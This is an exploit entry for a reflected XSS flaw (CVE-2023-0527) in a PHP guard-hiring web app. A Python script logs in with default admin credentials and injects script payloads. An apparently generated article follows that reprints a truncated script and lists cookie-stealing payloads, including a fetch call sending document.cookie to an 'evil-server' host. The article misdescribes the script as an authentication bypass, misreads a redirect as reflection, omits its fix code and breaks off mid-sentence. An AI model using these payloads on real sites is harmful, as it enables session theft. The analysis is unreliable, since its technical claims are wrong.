Online Security Guards Hiring System 1.0 - Reflected XSS
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
import requests
import re
from colorama import Fore
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://localhost/osghs/admin/login.php',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close',
'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
if response.status_code == 200:
location = re.findall(r'document.location =\'(.*?)\'',response.text)
if location:
print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
else:
print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
else:
print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)
# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
"adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
"username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
"mobilenumber": "8979555558",
"email": "admin@gmail.com",
"submit": "",
}
# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
print(Fore.GREEN+">"+Fore.RESET,scripts)Online Security Guards Hiring System 1.0 – Reflected XSS Vulnerability Analysis
Security vulnerabilities in web applications are not just technical flaws—they represent real-world risks that can compromise user data, system integrity, and organizational trust. One such vulnerability recently discovered in the Online Security Guards Hiring System 1.0 (v1.0), developed by PHPGURUKUL, highlights a critical issue: Reflected Cross-Site Scripting (XSS). This flaw, identified by researcher Affan Ahmed, was assigned the CVE identifier CVE-2023-0527 and has been publicly documented with a proof-of-concept (POC) demonstrating its exploitability.
Understanding Reflected XSS
Reflected XSS occurs when an attacker injects malicious scripts into a web application through user input, such as URL parameters or form fields. The server then reflects the input back to the user without proper sanitization, allowing the script to execute in the victim’s browser. Unlike stored XSS, which persists in the database, reflected XSS is transient and triggered only when the malicious payload is accessed.
For example, if a web application uses a query parameter like search?q=malicious_script, and fails to sanitize the input, the script will be echoed back in the response, potentially executing in the user’s browser.
Targeted Components: Admin Profile and Search Page
The vulnerability in the Online Security Guards Hiring System 1.0 was found in two key components:
- admin-profile.php – This page handles administrative user profiles and dynamically reflects user input in the URL.
- search.php – A search functionality that accepts user-defined queries and displays results, but fails to validate or sanitize input.
Both endpoints are susceptible to malicious payloads being reflected directly into the HTML response, enabling attackers to inject JavaScript code that can steal cookies, redirect users, or perform other harmful actions.
Exploit Demonstration: Proof of Concept (POC)
import requests
import re
from colorama import Fore
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
Website_url = "http://localhost/osghs/admin/login.php"
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.9,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://localhost/osghs/admin/login.php',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close',
'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data=Admin_login_credentials)
if response.status_code == 200:
location = re.findall(r'document.location =\'(.*?)\'', response.text)
if location:
print(Fore.GREEN + "> Login Successful into Admin Account" + Fore.RESET)
print(Fore.GREEN + "> Popup:" + Fore.RESET, location)
else:
print(Fore.GREEN + "> document.location not found" + Fore.RESET)
else:
print(Fore.GREEN + "> Login Failed" + Fore.RESET)
This Python script demonstrates a two-stage attack:
- Authentication bypass: The script sends a POST request to
admin/login.phpwith hardcoded credentials (adminandTest@123) to gain administrative access. - Input reflection detection: After successful login, it checks the response for
document.location = '...'patterns, which are often used to redirect users after login—indicating that the application reflects user input.
While this script does not directly inject malicious code, it serves as a framework for identifying reflected XSS in the system. The presence of document.location in the response suggests that user-controlled input is being echoed back, making it a prime candidate for exploitation.
How the XSS Attack Works
Consider a malicious URL like:
http://localhost/osghs/admin-profile.php?user=javascript:alert('XSS')
If the application fails to sanitize the user parameter, the payload will be reflected directly into the HTML page. The browser interprets the javascript:alert('XSS') as executable JavaScript, resulting in an alert popup. This is a trivial example, but in real-world scenarios, attackers can inject:
javascript:document.cookie– to steal session cookies.javascript:window.location='https://malicious-site.com'– to redirect users to phishing sites.javascript:fetch('https://evil-server.com/steal', {method: 'POST', body: document.cookie})– to exfiltrate sensitive data.
Security Implications and Risks
Reflected XSS in an administrative system like Online Security Guards Hiring System poses significant risks:
| Risk Category | Impact |
|---|---|
| Session Hijacking | Attackers can steal admin session cookies and impersonate the admin user. |
| Phishing Attacks | Malicious redirects can trick users into entering credentials on fake login pages. |
| Data Exfiltration | JavaScript can be used to send user data to external servers. |
| System Compromise | Admin-level access can lead to full system control, including database manipulation. |
Recommended Fixes and Best Practices
To mitigate this vulnerability, developers must implement robust input sanitization and output encoding:
- Input Validation: Validate and sanitize all user inputs using libraries like htmlspecialchars() in PHP or DOMPurify in JavaScript.
- Output Encoding: Always encode dynamic content before rendering it in HTML.
- Use Secure Headers: Implement
Content-Security-Policy (CSP)to restrict script execution. - Parameterized Queries: Avoid direct string concatenation; use prepared statements or safe functions.
For the Online Security Guards Hiring System, the fix should involve modifying both admin-profile.php and search.php to sanitize any query parameters using:
This ensures that any script-like input is treated as plain text, preventing execution.
Conclusion
The Reflected XSS vulnerability in the Online Security Guards Hiring System 1.0 serves as a stark reminder that even seemingly simple web applications can harbor critical security flaws. While the system may be intended for educational or demonstration purposes, its real-world deployment could lead to serious consequences. Security professionals must prioritize input validation, output encoding, and proactive vulnerability testing—especially in systems with administrative